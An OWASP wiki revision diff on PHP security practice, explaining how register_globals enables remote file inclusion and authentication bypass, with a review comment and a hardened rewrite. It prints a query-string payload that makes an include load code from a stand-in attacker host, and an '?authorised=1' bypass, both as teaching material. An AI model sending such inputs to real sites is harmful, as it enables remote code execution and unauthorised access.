Difference between revisions of "PHP Security Leading Practice"

From OWASP
(New page: ===Global Variables=== One does not need to explicitly create "global variables" this is done via the php.ini file by setting the "register_globals" function on. Appending global variable...)
 
(Global Variables)
Line 1: Line 1:
 
===Global Variables===
 
===Global Variables===
  
One does not need to explicitly create "global variables" this is done via the php.ini file by setting the "register_globals" function on.
+
One does not need to explicitly create "global variables" this is done via the php.ini file by setting the "register_globals" function on. register_globals has been disabled by default since PHP 4.1.0
Appending global variables to the URL may be a way to circumvent authentication.
+
 
 +
Include directives in PHP can be vulnerable if register_globals is enabled.
 +
 
 +
<?PHP
 +
 +
include "$dir/script/dostuff.php";
 +
 
 +
?>
 +
 
 +
With register_globals enabled the $dir variable can be passed in via the query string:
 +
 
 +
?dir=http://www.haxor.com/gimmeeverything.php
 +
 +
This would result in the $dir being set to:
 +
<?PHP
 +
 +
include "http://www.haxor.com/gimmeeverything.php";
 +
 +
?>
 +
 
 +
Appending global variables to the URL may be a way to circumvent authentication:
 +
 +
<?PHP
 +
if(authenticated_user())
 +
{
 +
  $authorised=true;
 +
}
 +
 +
if($authorised)
 +
{
 +
  give_family_jewels()
 +
}
 +
 +
?>
 +
 
 +
if this page was requested with register_globals enabled using the following parameter ?authorised=1 in the query string the athentication  functionalotu assuems the used is authorised to proceed.
 +
Without register_globals enabled the variable $authorised would not be affected by the $authorised=1 parameter.
  
 
===Error handling===
 
===Error handling===
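Review bot: the authentication example added in this hunk has a PHP parse error: the call `give_family_jewels()` inside the second `if` block needs a trailing semicolon. Since the point of the snippet is that `$authorised` is never initialised before `if($authorised)`, a one-line comment saying so (and that adding `$authorised=false;` before the first `if` is the fix) would make the lesson explicit. The sentence after the snippet also needs proofreading: "the athentication functionalotu assuems the used is authorised" should read "the authentication functionality assumes the user is authorised", and "$authorised=1 parameter" should be "authorised=1 parameter".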

Revision as of 12:50, 23 October 2007

Global Variables

One does not need to explicitly create "global variables": this is done via the php.ini file by turning the "register_globals" directive on. register_globals has been disabled by default since PHP 4.1.0.

Include directives in PHP can be vulnerable if register_globals is enabled.

<?PHP

include "$dir/script/dostuff.php";
 
?>

With register_globals enabled the $dir variable can be passed in via the query string:

?dir=http://www.haxor.com/gimmeeverything.php

This would result in the $dir being set to:

<?PHP

include "http://www.haxor.com/gimmeeverything.php";

?>

Appending global variables to the URL may be a way to circumvent authentication:

<?PHP
if(authenticated_user())
{
  $authorised=true;   // only ever set to true; never initialised to false first
}

if($authorised)       // with register_globals on, a ?authorised=1 query parameter populates this variable
{
  give_family_jewels();
}
?>

If this page was requested with register_globals enabled and the parameter ?authorised=1 in the query string, the authentication functionality assumes the user is authorised to proceed. Without register_globals enabled, the variable $authorised would not be affected by the authorised=1 parameter.
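The two snippets above, rewritten as an added example (not code from the OWASP page) so they stay safe whether or not register_globals is on: the include path is picked from an allowlist and checked with realpath(), and $authorised is initialised before use. authenticated_user() and give_family_jewels() are assumed helpers stubbed here, and the "modules" directory is a placeholder.

```php
<?php
// Added example, not from the OWASP page: the page's two snippets rewritten so they
// stay safe even if register_globals is on. authenticated_user() and
// give_family_jewels() are assumed helpers, stubbed here.
declare(strict_types=1);

function authenticated_user(): bool { return false; }   // stub: nobody is logged in
function give_family_jewels(): string { return "the family jewels\n"; }

// 1. Include: never build a path from request data. Map the request value onto a
//    fixed allowlist under a directory the application owns (placeholder path).
const SCRIPT_BASE  = __DIR__ . '/modules';
const ALLOWED_DIRS = ['reports' => 'reports', 'billing' => 'billing'];

function resolve_script(array $request): ?string
{
    $key = $request['dir'] ?? '';
    if (!isset(ALLOWED_DIRS[$key])) {
        return null;   // unknown value, URL, or ../ sequence: refuse to include anything
    }
    $path = SCRIPT_BASE . '/' . ALLOWED_DIRS[$key] . '/script/dostuff.php';
    $real = realpath($path);   // resolves symlinks and ../; false if the file is missing
    $base = realpath(SCRIPT_BASE);
    if ($real === false || $base === false || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;   // resolved file escaped the base directory
    }
    return $real;
}

// 2. Authorisation: initialise the flag and derive it only from the auth check, so a
//    request variable named "authorised" has nothing to overwrite.
function is_authorised(): bool
{
    $authorised = false;   // the line missing from the page's example
    if (authenticated_user()) {
        $authorised = true;
    }
    return $authorised;
}

// 3. Startup check: refuse to run if the directive is still enabled (PHP 5.4 and
//    later removed it, and ini_get() then returns false).
if (filter_var(ini_get('register_globals'), FILTER_VALIDATE_BOOLEAN)) {
    exit('register_globals must be off');
}

// Constructed request mirroring the page's include payload; request data is read
// from an explicit array, never through a bare variable the request could populate.
$remoteInclude = ['dir' => 'http://www.haxor.com/gimmeeverything.php'];
var_dump(resolve_script($remoteInclude));
echo is_authorised() ? give_family_jewels() : "denied\n";
```

Whatever the query string contains, is_authorised() has no uninitialised variable for it to land in, and resolve_script() never includes anything outside the allowlisted directories.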

Error handling

Where possible, check whether error reporting has been turned off in php.ini, i.e. whether "error_reporting" is off.

File Manipulation

Good Things to Use

strip_tags(): Removes any HTML from a string
nl2br(): Converts new line characters to the HTML break tag "br"
htmlspecialchars():